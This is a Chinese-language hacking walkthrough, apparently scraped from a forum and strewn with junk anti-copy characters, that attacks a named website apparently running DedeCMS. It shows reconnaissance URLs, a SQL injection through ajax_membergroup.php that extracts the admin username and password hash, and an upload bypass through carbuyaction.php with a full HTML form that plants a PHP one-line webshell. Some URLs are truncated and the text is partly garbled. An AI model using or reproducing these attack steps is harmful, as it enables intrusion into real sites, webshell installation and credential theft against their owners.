①注入漏洞。" {2 {- Z7 f9 v8 X ]: ^$ V0 ]
这站 http://www.political-security.com/4 a' `- p! H3 U6 x# j8 [
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
+ `+ }8 \6 }$ ^. x2 Z$ swww.political-security.com/data/mysql_error_trace.inc 爆后台5 M4 o2 W" h) v/ J" g& P
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
2 `* Q- S" p- F7 `; y- w9 g$ j$ i然后写上语句
9 r( R* W) a# J9 J- u7 n, `2 P |查看管理员帐号
8 J, }5 [7 ~# z' Ihttp://www.political-security.co ... &membergroup=@`
6 G( q; E5 ], R( q c- z+ A% ^& F' K1 l2 n
admin
" J; d! l) f" W/ U# x# h5 B& Z* O$ i/ h0 S% K3 ~
查看管理员密码
# }; M3 t. s. i( {! S: Y http://www.political-security.co ... &membergroup=@`
( }0 ~4 c! `; E- p4 ?% p8 F2 c3 ^
8d29b1ef9f8c5a5af429, }% N" S! P1 f) D" W( m- G
6 K) ]: ^' i! v9 ^5 x2 D查看管理员密码
! x4 }8 G; f J- d. b& z1 \
* ]1 [" h! A' j1 ]5 n得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5 W. x3 Z7 W9 L* p% f3 I
7 j: Y5 V4 S3 Z% a8d2
' t/ ^6 t+ y; i4 I0 Z1 H% b4 L2 x2 f9b1ef9f8c5a5af426 V ] S" {$ v' _! C* I
9
7 i6 c0 N$ Z! O" D v h0 ~0 l# K: [; C! h9 t: R
cmd5没解出来 只好测试第二个方法
; M" ~7 C( R0 f8 L; s" ?8 p- C5 T1 C9 m5 e" H$ z7 ^; X1 p& Q
( j$ f% a' k: k* h S* \6 [
②上传漏洞:
. g7 j6 ?8 Z+ k8 G! d' b" j
( F' E& A+ L. Q; }$ q" f只要登陆会员中心,然后访问页面链接
) K2 M3 ] W7 i0 a: h4 u- U5 y“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
9 \6 s! X& @5 `" R4 }% P
/ U/ r5 u$ }; \, \/ S如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
8 X" }4 B3 P9 S: _1 P7 R; S( g" ^9 _% S. T: l1 B& `
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm8 ?3 H" L" q8 `- T% C, N9 j# d
% h( ]% A) G& C6 K g( E' O0 _<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
: d r3 z/ F( J, M9 \/ m) P或者
4 N0 \3 y* L% x* p即可上传成功 |